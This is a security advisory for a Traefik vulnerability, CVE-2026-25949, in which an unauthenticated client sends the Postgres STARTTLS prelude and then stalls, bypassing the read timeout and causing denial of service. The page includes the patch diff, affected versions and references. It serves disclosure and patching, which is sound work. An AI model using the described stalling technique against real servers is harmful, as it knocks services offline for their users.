High severityNVD Advisory· Published Feb 12, 2026· Updated Feb 12, 2026
Traefik: TCP readTimeout bypass via STARTTLS on Postgres
CVE-2026-25949
Description
Traefik is an HTTP reverse proxy and load balancer. Prior to 3.6.8, there is a potential vulnerability in Traefik managing STARTTLS requests. An unauthenticated client can bypass Traefik entrypoint respondingTimeouts.readTimeout by sending the 8-byte Postgres SSLRequest (STARTTLS) prelude and then stalling, causing connections to remain open indefinitely, leading to a denial of service. This vulnerability is fixed in 3.6.8.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
github.com/traefik/traefik/v3Go | < 3.6.8 | 3.6.8 |
Affected products
1Patches
131e566e9f1d7Remove conn deadline after STARTTLS negociation
2 files changed · +17 −12
pkg/server/router/tcp/postgres.go+14 −6 modified@@ -7,6 +7,7 @@ import ( "io" "net" "sync" + "time" "github.com/rs/zerolog/log" tcpmuxer "github.com/traefik/traefik/v3/pkg/muxer/tcp" @@ -46,7 +47,7 @@ func isPostgres(br *bufio.Reader) (bool, error) { func (r *Router) servePostgres(conn tcp.WriteCloser) { _, err := conn.Write(PostgresStartTLSReply) if err != nil { - conn.Close() + _ = conn.Close() return } @@ -55,32 +56,39 @@ func (r *Router) servePostgres(conn tcp.WriteCloser) { b := make([]byte, len(PostgresStartTLSMsg)) _, err = br.Read(b) if err != nil { - conn.Close() + _ = conn.Close() return } hello, err := clientHelloInfo(br) if err != nil { - conn.Close() + _ = conn.Close() return } if !hello.isTLS { - conn.Close() + _ = conn.Close() return } + // The deadline was there to prevent hanging connections while waiting for the client, + // now that the STARTTLS message and Client Hello have been read, + // we can remove it and leave its handling to the TCP reverse proxy eventually. + if err := conn.SetDeadline(time.Time{}); err != nil { + log.Error().Err(err).Msg("Error while setting deadline") + } + connData, err := tcpmuxer.NewConnData(hello.serverName, conn, hello.protos) if err != nil { log.Error().Err(err).Msg("Error while reading TCP connection data") - conn.Close() + _ = conn.Close() return } // Contains also TCP TLS passthrough routes. handlerTCPTLS, _ := r.muxerTCPTLS.Match(connData) if handlerTCPTLS == nil { - conn.Close() + _ = conn.Close() return }
pkg/server/router/tcp/router.go+3 −6 modified@@ -126,11 +126,6 @@ func (r *Router) ServeTCP(conn tcp.WriteCloser) { } if postgres { - // Remove read/write deadline and delegate this to underlying TCP server. - if err := conn.SetDeadline(time.Time{}); err != nil { - log.Error().Err(err).Msg("Error while setting deadline") - } - r.servePostgres(r.GetConn(conn, getPeeked(br))) return } @@ -141,7 +136,9 @@ func (r *Router) ServeTCP(conn tcp.WriteCloser) { return } - // Remove read/write deadline and delegate this to underlying TCP server (for now only handled by HTTP Server) + // The deadline was set to avoid blocking on the initial read of the ClientHello, + // but now that we have it, we can remove it, + // and delegate this to underlying TCP server (for now only handled by HTTP Server). if err := conn.SetDeadline(time.Time{}); err != nil { log.Error().Err(err).Msg("Error while setting deadline") }
Vulnerability mechanics
Generated by null/stub on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
5- github.com/advisories/GHSA-89p3-4642-cr2wghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2026-25949ghsaADVISORY
- github.com/traefik/traefik/commit/31e566e9f1d7888ccb6fbc18bfed427203c35678ghsax_refsource_MISCWEB
- github.com/traefik/traefik/releases/tag/v3.6.8ghsax_refsource_MISCWEB
- github.com/traefik/traefik/security/advisories/GHSA-89p3-4642-cr2wghsax_refsource_CONFIRMWEB
News mentions
0No linked articles in our index yet.